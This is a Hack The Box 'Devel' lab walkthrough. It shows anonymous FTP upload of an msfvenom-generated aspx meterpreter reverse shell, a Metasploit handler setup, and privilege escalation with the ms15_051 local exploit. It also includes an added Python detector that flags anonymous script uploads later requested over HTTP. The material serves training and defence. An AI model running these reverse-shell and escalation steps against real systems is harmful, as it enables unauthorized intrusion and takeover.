Windows Privilege Escalation - I - HTB Devel Walkthrough
Windows privilege escalation is a broad topic: there are many techniques for gaining high privileges, UAC bypass among them.
Besides the manual methods, the Metasploit Framework has useful modules for Windows privesc. In the Devel room on HTB we focus on Metasploit. Let's look at the details.
1. Let's start with an nmap port scan with service and vulnerability detection.
We see that ports 21 and 80 are open, and anonymous FTP is allowed.
The FTP service running is Microsoft ftpd.
2. Let's look at the server and try to upload a file with the put command.
3. When we look at the uploaded file on the web page, we can see its contents. Thus, if we have execution permission, we can run a reverse shell.
The server is a Windows server, so the file should most probably be an asp or aspx file.
We can use msfvenom to create a reverse shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx -o reverse.aspx
and upload the reverse.aspx file using the put command.
4. Start msfconsole and set up the handler with the same payload used in msfvenom:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (IP Address)
set LPORT (Your Port)
5. Go to the web page and run the file:
10.10.10.5/reverse.aspx
Bingo! We got a shell.
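The chain used above (an anonymous FTP write into the web root, followed by an HTTP request for the uploaded script) is exactly what a defender should alert on. The following is an added example, not part of the original walkthrough: it correlates constructed, simplified W3C-style Microsoft FTP and IIS log lines and flags a server-side script uploaded by the anonymous user that is then requested over HTTP shortly afterwards. The field layout and the log lines are assumptions for illustration.

```python
import os
from datetime import datetime

# Extensions IIS treats as server-side scripts when they land in the web root.
EXECUTABLE_EXT = {".asp", ".aspx", ".ashx", ".asmx"}

# Constructed, simplified log lines: date time c-ip cs-username cs-method cs-uri-stem sc-status
FTP_LOG = """\
2021-03-01 10:00:01 10.10.14.3 anonymous STOR /test.txt 226
2021-03-01 10:00:40 10.10.14.3 anonymous STOR /reverse.aspx 226
2021-03-01 10:01:02 10.10.14.3 babis STOR /report.docx 226
"""
IIS_LOG = """\
2021-03-01 10:00:10 10.10.14.3 - GET /test.txt 200
2021-03-01 10:00:55 10.10.14.3 - GET /reverse.aspx 200
2021-03-01 10:01:10 10.10.14.9 - GET /index.htm 200
"""

def parse(log):
    """Parse the constructed W3C-style lines into (ts, ip, user, method, uri, status) tuples."""
    events = []
    for line in log.splitlines():
        if not line.strip() or line.startswith("#"):   # skip blanks and W3C directive lines
            continue
        date, time, ip, user, method, uri, status = line.split()
        events.append((datetime.fromisoformat(f"{date} {time}"), ip, user, method, uri, int(status)))
    return events

def find_upload_then_execute(ftp_log, iis_log, window_s=600):
    """Return (uri, upload_ts, request_ts) for each anonymous STOR of a script
    that is requested over HTTP within window_s seconds of the upload."""
    uploads = [e for e in parse(ftp_log)
               if e[3] == "STOR" and e[2].lower() == "anonymous"
               and os.path.splitext(e[4])[1].lower() in EXECUTABLE_EXT]
    requests = parse(iis_log)
    hits = []
    for up_ts, _, _, _, uri, _ in uploads:
        for req_ts, _, _, _, req_uri, _ in requests:
            if req_uri == uri and 0 <= (req_ts - up_ts).total_seconds() <= window_s:
                hits.append((uri, up_ts, req_ts))
                break
    return hits

if __name__ == "__main__":
    for uri, up, req in find_upload_then_execute(FTP_LOG, IIS_LOG):
        print(f"ALERT: anonymous upload of {uri} at {up:%H:%M:%S}, requested over HTTP at {req:%H:%M:%S}")
```

The plain-text upload is ignored because it cannot execute, and the authenticated user's upload is ignored because the rule targets the anonymous account; only the aspx dropped by anonymous and then fetched over HTTP is flagged.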
6. Let's background the shell and look for privesc using the local_exploit_suggester module.
7. I look at the results and try them one by one.
exploit/windows/local/ms15_051_client_copy_image
works. I got a high-privileged shell.
In C:\Users\Administrator\Desktop\root.txt and C:\Users\babis\Desktop\user.txt I obtain the flags.